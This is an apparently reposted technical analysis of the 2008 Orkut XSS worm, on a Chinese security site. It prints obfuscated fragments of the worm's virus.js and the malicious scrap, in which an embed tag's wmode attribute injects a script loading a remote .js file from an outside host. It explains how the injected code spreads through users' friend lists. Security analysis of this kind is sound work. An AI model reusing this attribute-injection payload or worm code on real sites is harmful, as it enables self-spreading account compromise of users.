频道栏目
首页 > 安全 > 网站安全 > 正文

Orkut XSS Worm的技术分析

2008-01-01 00:58:13      个评论      
收藏   我要投稿

Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js file," which was injected using an embed tag. Here is a snippet of the JavaScript file:

function $(p,a,c,k,e,d) { e=function(c) { return(c35?String.fromCharCode(c+29):c.toString(36)) }; if(!.replace(/^/,String)){ while(c--){d[e(c)]=k[c]||e(c)} k=[function(e){return d[e]}]; e=function(){return\w+}; c=1 }; while(c--){ if(k[c]){ p=p.replace(new RegExp(\b+e(c)+\b,g),k[c]) } } return p };

setTimeout(
$(5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(q,o://k.w.p/1P.z?1R=1S,C);
3.12(10-1e,Q/x-k-17-1b);3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};

We can see from the above code that the JavaScript is heavily obfuscated. After decoding and analyzing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when the virus.js script is executed it forces the user to join a community called “Infectados pelo Vírus do Orkut”. The name of this community is in Portuguese and translates to “Infected by Virus Orkut.”

This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends them a malicious scrap. The worm uses Orkut scrap entries as its vector of propagation. Below is an example of the XML code to define the Orkut scrap:

2008 vem ai… que ele comece mto bem par avc <br/> [silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver] <br/> <embed src=aspx" target=_blank>http://www.orkut.com/LoL.aspx type= “application/x-shockwave-flash” wmode=”transparent’); Script=document.createElement(‘script’); Script.src=’http://files.myopera111.com/[REMOVED].js’; Document.getElementByTagname(‘head’)[0].appendChild (script);escape(‘” width=”1” height=”1”> </embed>

When you look at the code XML there are a few attributes for the embed tag, such as wmode, width, height, etc. The embed tag expects these attributes in order to create a flash object to display the flash content. Now when you look closely at the code, notice the wmode attribute:

wmode=”transparent’);

The author has closed wmode with ‘); and has added some script code in the attribute value itself. Let’s analyze this further. We tested the script with a variant of the malicious scrap:

“<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent” width=”1” height=”1”>”.

When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:

<script type="text/javascript"> var flashWriter = new _SWFObject(http://www.orkut.com/LoL.aspx, 337533968, 1, 1, 9, #FFFFFF, autohigh, , , 337533968); flashWriter._addParam(wmode, transparent); flashWriter._addParam(allowNetworking, internal); flashWriter._addParam(allowScriptAccess, never); flashWriter._setAttribute(style, ); flashWriter._write(flashDiv337533968);</script>

The Orkut application parsed the scrap text and created the flash object with values specified in the scrap.
If we look at the source code of the malicious scrap it looks like the below sample (the injected code is marked in bold and red). Note the escape function is added to allow the malicious code to be integrated:

flashWriter._addParam ( wmode, transparent); script = document.createElement ( script); script.src = http://files.myopera.com/virusd[REMOVED]; document.getElementsByTagName ( head) [0]. AppendChild script); escape (); flashWriter._addParam ( allowNetworking, internal); flashWriter._addParam ( allowSc

相关TAG标签 技术
上一篇:浅析网站安全攻防
下一篇:About XSS Worm
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站